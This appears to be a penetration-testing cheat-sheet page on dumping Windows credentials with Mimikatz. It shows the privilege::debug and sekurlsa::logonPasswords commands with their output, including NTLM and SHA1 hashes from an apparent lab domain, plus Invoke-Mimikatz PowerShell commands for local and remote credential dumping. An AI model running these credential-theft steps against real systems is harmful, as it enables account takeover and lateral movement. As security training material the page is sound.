# Mimikatz
{% embed url="" %} ### Credentials Dumping with Mimikatz Set privilege mode to debug (After running it as admin) ``` C:\Users\pparker\Downloads\mimikatz_trunk\x64>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK ``` Checking available modules ``` mimikatz # sekurlsa:: ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found ! Module : sekurlsa Full name : SekurLSA module Description : Some commands to enumerate credentials... msv - Lists LM & NTLM credentials wdigest - Lists WDigest credentials kerberos - Lists Kerberos credentials tspkg - Lists TsPkg credentials livessp - Lists LiveSSP credentials cloudap - Lists CloudAp credentials ssp - Lists SSP credentials logonPasswords - Lists all available providers credentials process - Switch (or reinit) to LSASS process context minidump - Switch (or reinit) to LSASS minidump context bootkey - Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials pth - Pass-the-hash krbtgt - krbtgt! dpapisystem - DPAPI_SYSTEM secret trust - Antisocial backupkeys - Preferred Backup Master keys tickets - List Kerberos tickets ekeys - List Kerberos Encryption Keys dpapi - List Cached MasterKeys credman - List Credentials Manager ``` See logon passwords ``` mimikatz # sekurlsa::logonPasswords Authentication Id : 0 ; 426939 (00000000:000683bb) Session : Interactive from 1 User Name : pparker Domain : MARVEL Logon Server : HYDRA-DC Logon Time : 5/26/2025 10:25:53 PM SID : S-1-5-21-817282392-3664699690-768258319-1106 msv : [00000003] Primary * Username : pparker * Domain : MARVEL * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 * DPAPI : 220a3e34eaf9b45b4bc0f153f861610b tspkg : wdigest : * Username : pparker * Domain : MARVEL * Password : (null) kerberos : * Username : pparker * Domain : MARVEL.LOCAL * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 426917 (00000000:000683a5) Session : Interactive from 1 User Name : pparker Domain : MARVEL Logon Server : HYDRA-DC Logon Time : 5/26/2025 10:25:53 PM SID : S-1-5-21-817282392-3664699690-768258319-1106 msv : [00000003] Primary * Username : pparker * Domain : MARVEL * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 * DPAPI : 220a3e34eaf9b45b4bc0f153f861610b tspkg : wdigest : * Username : pparker * Domain : MARVEL * Password : (null) kerberos : * Username : pparker * Domain : MARVEL.LOCAL * Password : (null) ssp : credman : cloudap : ``` ### Mimikatz Powershell You need admin priveleges ``` ..\Invoke-Mimikatz.ps1 dumpping credentials Invoke-Mimikatz -DumpCreds -Verbose Invoke-Mimikatz –DumpCreds –ComputerName @(“comp1”,”comp2”) ```

Remote Dumping Credentials